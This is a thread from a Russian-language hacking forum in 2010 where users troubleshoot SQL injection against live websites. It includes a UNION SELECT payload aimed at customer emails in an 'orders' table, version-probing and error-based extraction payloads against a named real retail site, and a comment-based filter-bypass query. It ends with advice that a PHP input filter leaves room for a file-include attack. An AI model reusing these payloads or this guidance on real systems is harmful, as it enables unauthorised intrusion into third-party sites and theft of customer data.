ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
22.02.2010, 17:59
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
Сообщение от Darren
Почему может выходить такая ошибка когда я пытаюсь вывести данные
запрос типа:
http://xxx/latest.asp?ID=&offset=&prod_id=8896%20union+select %201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6,37,38,39,40,email%20from%20orders%20--
ADODB.Command error '800a0d5d'
Application uses a value of the wrong type for the current operation.
/ProdDetail1.asp, line 20
MSSQL 
Сообщение от B1t.exe
ноль реакции кидает на галвную (ссылка не меняется) А с чего ты тогда вообще взял, что там SQL inj?
|
|
|
22.02.2010, 18:04
|
|
Banned
Регистрация: 14.06.2008
Сообщений: 34
Провел на форуме:
119183
Репутация:
13
|
|
Сообщение от 0x0.Injector
может быть потому что нет таблицы orders и поля email
2 SeNaP а помоему Access
нет когда нет поля он пишет.
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[TCX][MyODBC]Unknown column 'admin' in 'field list'
Развожу руками((
Последний раз редактировалось Darren; 22.02.2010 в 18:09..
|
|
|
|
22.02.2010, 18:06
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708
Репутация:
208
|
|
SeNaP
А с чего ты тогда вообще взял, что там SQL inj?
да не откуда, просто пошел интерес и хочется что то понять в это деле. Думал нашел нить и можно цеплятся, а вот облом
|
|
|
|
22.02.2010, 18:09
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
Сообщение от B1t.exe
SeNaP
да не откуда, просто пошел интерес и хочется что то понять в это деле. Думал нашел нить и можно цеплятся, а вот облом
с начало
|
|
|
|
22.02.2010, 18:10
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
Сообщение от SeNaP
MSSQL
Сообщение от 0x0.Injector
2 SeNaP а помоему Access
Сообщение от mailbrush
Если доступа к information_schema нету
mysql, причем http://www.limenatural.co.uk/prod1.asp?ID=1+or+substring(version(),1,1)=4
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
|
|
|
|
22.02.2010, 20:15
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Код:
http://www.limenatural.co.uk/prod1.asp?ID=1+or+(1,1)=(select+count(0),concat((select+version()),floor(rand(0)*2))+from(orders)+group+by+2)
|
|
|
|
23.02.2010, 02:12
|
|
Новичок
Регистрация: 28.09.2009
Сообщений: 19
Провел на форуме:
61814
Репутация:
28
|
|
Сообщение от l1ght
from [order], from "order"
Спасибо, l1ght! Все работает! А то хотел уже прыгать с моста... С меня креда!
|
|
|
|
23.02.2010, 03:01
|
|
Banned
Регистрация: 05.02.2010
Сообщений: 70
Провел на форуме:
177258
Репутация:
5
|
|
Возможно ли обойти ?
PHP код:
if (isset($_GET['pagina']))
{
$tmp = $_GET['pagina'];
$tmp1 = (eregi_replace("['<>(){}!$%&+@|;'\]","",$tmp));
|
|
|
|
23.02.2010, 06:35
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
Код:
1/**/union/**/select/**/table_name/**/information_schema.tables/**/limit/**/1,1
Что то типа такого, можно ведь обойтись спокойно и без того что там фильтруется если скуля стандартная. Если хотел воспользоваться теми символами что там режутся то в этой статье упоминается про eregi, так что смею предположить что в новых версиях php это не актуально в отличии от ereg.
|
|
|
|
23.02.2010, 10:39
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от scorpic393
Возможно ли обойти ?
PHP код:
if (isset($_GET['pagina']))
{
$tmp = $_GET['pagina'];
$tmp1 = (eregi_replace("['<>(){}!$%&+@|;'\]","",$tmp));
точки и слеша в регулярке нет - спокойно можно их юзать, ведь там инклюд же, судя по названию пеерменной 
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
